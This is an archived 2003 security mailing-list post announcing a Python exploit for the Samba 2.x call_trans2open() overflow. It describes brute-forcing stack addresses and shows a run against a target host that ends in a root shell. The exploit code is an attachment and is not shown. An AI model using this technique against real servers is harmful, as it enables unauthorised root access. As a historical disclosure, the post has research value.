|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
samba 2.x call_trans2open() exploit
From: noir sin (noir
olympos.org)
Date: Tue Apr 08 2003 - 06:01:00 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
0day is fragile! one day it's your precious, next day its worthless ...
anyways i put together this SAMBAExploit class in python which might be
interesting for folks since it's reusable in many other stuff ...
python cause; write once a heap, stack or fmt string exploit class and the
rest is just to "cp old_exp.py new_exp.py; vi new_exp.py"
exploit bruteforces all possible stack range and dups the already
connected socket for spawning the shell
greets to: Michael Teo for pysmb, lsd-pl for linux/findsck shellcode
- noir
noirjuneof44:/tmp/samba_exp2 > python samba_exp.py 172.17.1.132
[*] brute forcing well known addr range ... [*]
trying; retaddr: 0xbffed404
trying; retaddr: 0xbffed504
trying; retaddr: 0xbffed604
trying; retaddr: 0xbffed704
Linux localhost 2.4.9-e.3 #1 Fri May 3 17:02:43 EDT 2002 i686 unknown
cat /etc/redhat-rel*
Red Hat Linux Advanced Server release 2.1AS (Pensacola)
id
uid=0(root) gid=0(root) groups=99(nobody)
exit
*** Connection closed by remote host ***
- APPLICATION/X-GUNZIP attachment: samba_exp2.tar.gz
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]